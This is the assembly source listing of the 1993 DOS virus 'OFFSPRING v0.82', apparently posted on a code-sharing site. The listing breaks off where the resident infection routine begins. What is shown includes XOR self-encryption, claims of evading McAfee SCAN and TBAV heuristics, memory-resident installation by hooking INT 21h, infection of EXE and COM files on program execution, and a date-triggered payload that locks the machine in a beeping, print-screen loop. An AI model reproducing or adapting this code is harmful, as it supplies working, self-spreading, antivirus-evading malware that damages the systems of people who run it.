📄 offspr82.asm
字号:
;-------------------------------------------------------------------------
; ************************************************
; OFFSPRING v0.82 - BY VIROGEN - 09-06-93
; ************************************************
;
; - Compatible with : TASM /m2
;
; TYPE : Parastic & Spawning Resident Encrypting (PSRhA)
;
;
; VERSION : 0.82
; - No longer detectable by Mcafee SCAN as anything.
; - No longer detectable by TBAV heuristics.
;
;
; INFECTION METHOD : Everytime DOS function 4Bh (Execute File)
; is called the virus will infect up to 5 files
; in the current directory. It will first infect all
; EXE files by creating a corresponding COM. Once
; all EXE files have been infected, it then infects
; COM files. All COM files created by a spawning
; infection will have the read-only and hidden
; attribute.
;
;
; THE ENCRYPION OF THIS VIRUS :
; Ok, this virus's encryption method is a simple
; XOR. The encryption operands are changed directly.
; Also, the operands are switched around, and the
; encryption routine switches from using di to si.
; Not anything overly amazing, but it works.
;
;
;
;
title offspring_1
.286
cseg segment
assume cs: cseg, ds: cseg, ss: cseg, es: cseg
signal equ 7dh ; Installation check
reply equ 0fch ; reply to check
f_name equ 1eh ; Offset of file name in FF/FN buffer
f_sizel equ 1ch ; File size - low - loc in mem
f_sizeh equ 1ah ; File size - high - loc in mem
f_date equ 18h ; File date - loc in mem
f_time equ 16h ; File time - loc in mem
max_inf equ 05 ; Maximum files to infect per run
max_rotation equ 9 ; number of bytes in switch byte table
parastic equ 01 ; Parastic infection
spawn equ 00 ; Spawning infection
org 100h ; Leave room for PSP
;------------------------------------------------------------------
; Start of viral code
;------------------------------------------------------------------
start:
skip_dec:
jmp main ; Skip decryption, changes into NOP on
; replicated copies.
di_op db 0bfh
mov_di dw offset enc_data+2 ; Point to byte after encryption num
;
;-------------------------
; Encryption/Decryption
encrypt:
cx_m db 90h,0b9h ; MOV CX
b_wr dw (offset vend-offset enc_data)/2
xor_loop:
xor_op: xor word ptr [di],0666h ; Xor each word - number changes accordingly
sw_byte3: ; INC xx changes position in these bytes
inc di
nop
nop
sw_byte4:
inc di
nop
nop
loop xor_loop ; loop while cx != 0
ret_byte db 90h ; Changes to RET (0C3h) - then back to NOP
enc_data: ; Start of encrypted data
;-------------------------------
; Non-Resident portion of virus
;-------------------------------
main proc
db 0bdh ; MOV BP,xxxx - Load delta offset
set_bp:
dw 0000
mov word ptr skip_dec[bp],9090h ; NOP the jump past decryption
mov ax,ds: 002ch ; Get environment address
mov par_blk[bp],ax ; Save in parameter block for exec
mov par1[bp],cs ; Save segments for EXEC
mov par2[bp],cs
mov par_seg[bp],cs
mov ah,2ah ; Get date
int 21h
cmp dl,9 ; 9th?
jne no_display
mov ah,09 ; display virus name
lea dx,vname[bp]
int 21h
xor ax,ax ; seg 0
mov es,ax
mov dx,1010101010101010b ; lights
chg_lights: ; Infinite loop to change keyboard
mov word ptr es: [416h],dx ; 0040:0016h = keyb flags
ror dx,1 ; rotate bits
mov cx,0101h ; scan code/ascii
mov ah,05h ; push a beep onto keyb buf
int 16h
mov ah,10h ; Read key back so we don't fill
int 16h ; up the keyboard buffer
int 5h ; Print-Screen
mov ax,0a07h ; Write BEEP to screen
xor bh,bh
mov cx,1
int 10h
mov ah,86h ; Delay
mov cx,0002h
int 15h
jmp chg_lights
no_display:
call install ; check if installed, if not install
cmp byte ptr vtype[bp],parastic
je com_return
mov bx,(offset vend+50) ; Calculate memory needed
mov cl,4 ; divide by 16
shr bx,cl
inc bx
mov ah,4ah
int 21h ; Release un-needed memory
lea dx,file_dir-1[bp] ; Execute the original EXE
lea bx,par_blk[bp]
mov ch,0FBh ; tell mem. resident virus
mov ax,4b00h ; that it's us.
int 21h
mov ah,4ch ; Exit
int 21h
com_return:
mov si,bp
mov cx,6 ; Restore original first
add si,offset org_bytes ; six bytes of COM file
mov di,0100h
cld
rep movsb
mov ax,0100h ; Simulate CALL return to 0100h
push ax
ret
main endp
;--------------------------------------
; INSTALL - Install the virus
;--------------------------------------
install proc
mov ah,signal
int 21h
cmp ah,reply
je no_install
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds: [0],'Z' ;Is this the last MCB in
;the chain?
jne no_install
mov ax,ds: [3] ;Block size in MCB
sub ax,190 ;Shrink Block Size-quick estimate
mov ds: [3],ax
mov bx,ax
mov ax,es
add ax,bx
mov es,ax ;Find high memory seg
mov si,bp
add si,0100h
mov cx,(offset vend - offset start)
mov ax,ds
inc ax
mov ds,ax
mov di,100h ; New location in high memory
cld
rep movsb ; Copy virus to high memory
push es
pop ds
xor ax,ax
mov es,ax ; null es
mov ax,es: [21h*4+2]
mov bx,es: [21h*4]
mov ds: old21_seg,ax ; Store segment
mov ds: old21_ofs,bx ; Store offset
cli
mov es: [21h*4+2],ds ; Save seg
lea ax, new21
mov es: [21h*4],ax ; off
sti
no_install:
push cs ; Restore regs
pop ds
push cs
pop es
ret
install endp
;--------------------------------------------------------------------
; INT 21h
;---------------------------------------------------------------------
new21 proc ; New INT 21H handler
cmp ah, signal ; signaling us?
jne no
mov ah,reply ; yep, give our offspring what he wants
jmp end_21
no:
cmp ax,4b00h ; exec func?
je exec_func
jmp end_21
exec_func:
cmp ch,0FBh
je end_21
run_res:
pushf
push ax ; Push regs
push bx
push cx
push dx
push di
push si
push bp
push ds
push es
push sp
push ss
push cs
pop ds
xor ax,ax ; nullify ES
mov es,ax
cmp byte ptr add_mem,1 ; Restore system conventional mem size?
je rel_mem ;
cmp ah,48h ; alloc. mem block? If so we subtract 3k from
je set_mem ; total system memory.
jmp no_mem_func
set_mem:
sub word ptr es: [413h],3 ; Subtract 3k from total sys mem
inc byte ptr add_mem ; make sure we know to add this back
jmp no_mem_func
rel_mem:
add word ptr es: [413h],3 ; Add 3k to total sys mem
dec byte ptr add_mem
no_mem_func:
mov ah,2fh
int 21h ; Get the DTA
mov ax,es
mov word ptr old_dta,bx
mov word ptr old_dta+2,ax
push cs
pop es
call resident ; Call infection kernal
mov dx,word ptr old_dta
mov ax,word ptr old_dta+2
mov ds,ax
mov ah,1ah
int 21h ; Restore the DTA
pop ss ; Pop regs
pop sp
pop es
pop ds
pop bp
pop si
pop di
pop dx
pop cx
pop bx
pop ax
popf
end_21 :
db 0eah ; jump to original int 21h
old21_ofs dw 0 ; Offset of old INT 21H
old21_seg dw 0 ; Seg of old INT 21h
new21 endp ; End of handler
;------------------------
; Resident - This is called from the INT 21h handler
;-----------------------------
resident proc
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -